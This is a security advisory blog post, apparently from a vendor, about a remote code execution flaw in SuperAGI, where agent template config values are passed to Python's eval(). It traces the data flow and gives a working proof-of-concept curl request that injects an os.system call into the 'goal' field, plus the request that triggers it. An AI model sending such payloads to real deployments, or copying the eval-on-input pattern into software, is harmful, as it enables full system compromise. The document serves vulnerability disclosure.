How Cal.com Rebuilt AppSec After Going Closed Source
How Cal.com consolidated noisy security tooling into one continuous, context-aware pull request security program with Gecko.
Gecko Security
An RCE was found in SuperAGI in the AgentTemplate.eval_agent_config method. The vulnerability is caused by the direct use of Python’s eval() function on user-controlled input without any sanitization or validation. When an agent template is cloned from the marketplace or updated via the API, configuration values for keys such as ‘goal’, ‘constraints’, and ‘instruction’ are passed directly to eval(). The code in agent_template.py explicitly evaluates these values:
<code class="hljs language-python"><span class="hljs-keyword">elif</span> key == <span class="hljs-string">"goal"</span> <span class="hljs-keyword">or</span> key == <span class="hljs-string">"constraints"</span> <span class="hljs-keyword">or</span> key == <span class="hljs-string">"instruction"</span>:
<span class="hljs-keyword">return</span> <span class="hljs-built_in">eval</span>(value)
</code>Since these values can be controlled by an attacker, arbitrary Python code execution is possible, leading to complete system compromise.
Source:
AgentTemplate.fetch_marketplace_detailsuperagi/models/agent_template.pyresponse = requests.get(marketplace_url + “agent_templates/marketplace/template_details/” + str(agent_template_id),Intermediate:
AgentTemplate.clone_agent_template_from_marketplacesuperagi/models/agent_template.pyagent_configurations.append(AgentTemplateConfig(agent_template_id=template.id, key=key, value=str(value[“value”])))Sink:
AgentTemplate.eval_agent_configsuperagi/models/agent_template.pyreturn eval(value)eval() call in eval_agent_config will execute the malicious Python code in the ‘goal’ config.You can also exploit the same path via the template update API after creating a template:
<code class="hljs language-bash">curl -X PUT <span class="hljs-string">"http://localhost:3000/api/agent_templates/update_agent_template/1"</span> \
-H <span class="hljs-string">"Content-Type: application/json"</span> \
-d <span class="hljs-string">'{
"name": "Exploited Template",
"description": "RCE Test",
"agent_configs": {
"agent_workflow": "Goal Based Workflow",
"goal": "__import__(\"os\").system(\"touch /tmp/pwned\")",
"instruction": ["Test instruction"],
"constraints": ["Test constraint"],
"tools": ["Read File", "Write File"],
"exit": "No exit criterion",
"iteration_interval": 500,
"model": "gpt-3.5-turbo",
"max_iterations": 25,
"permission_type": "God Mode",
"LTM_DB": "Pinecone"
}
}'</span>
</code>Once the template is poisoned, accessing it triggers the execution: curl “http://localhost:3000/api/agent_templates/agent_config?agent_template_id=1”.
This vulnerability allows for complete system compromise by an attacker who can manipulate template data through either the marketplace or direct API access. The attacker can execute arbitrary code with the permissions of the service running SuperAGI, potentially leading to data theft, lateral movement within the network, persistent system access or infrastructure compromise.

Artemiy Malyshau
Co-founder & CTO
Artemiy served in an elite unit of the Austrian Cyber Forces, defending national infrastructure He was then the first employee at a government-backed cybersecurity research group, where he led security projects for Interpol and national governments. At Gecko he builds the platform trusted to sit inside Fortune 500 codebases, and holds it to the standard those governments taught him.
The latest news, technologies, and resources from our team.
How Cal.com consolidated noisy security tooling into one continuous, context-aware pull request security program with Gecko.
Gecko Security
Authorization bypass in n8n’s dynamic-credentials OAuth endpoints allows any authenticated user to operate on another user’s OAuth credential by supplying its ID, enabling unauthorized OAuth rebinding and revocation.
Artemiy Malyshau
An IDOR vulnerability in n8n’s public variables API allows authenticated users to read project variables outside their authorized scope, exposing secrets across project boundaries.
Artemiy Malyshau
Learn API scanning for automated security testing. Find vulnerabilities from broken authentication to business logic flaws in your endpoints.
Artemiy Malyshau
A complete guide to automated pentest tools and best practices. Learn what works, what doesn’t, and how to implement continuous security testing.
Artemiy Malyshau
Compare the best AI-powered application security testing tools. Find which tools detect business logic flaws and broken access control.
Artemiy Malyshau
Occasional updates, new content, and insights. No spam; unsubscribe anytime.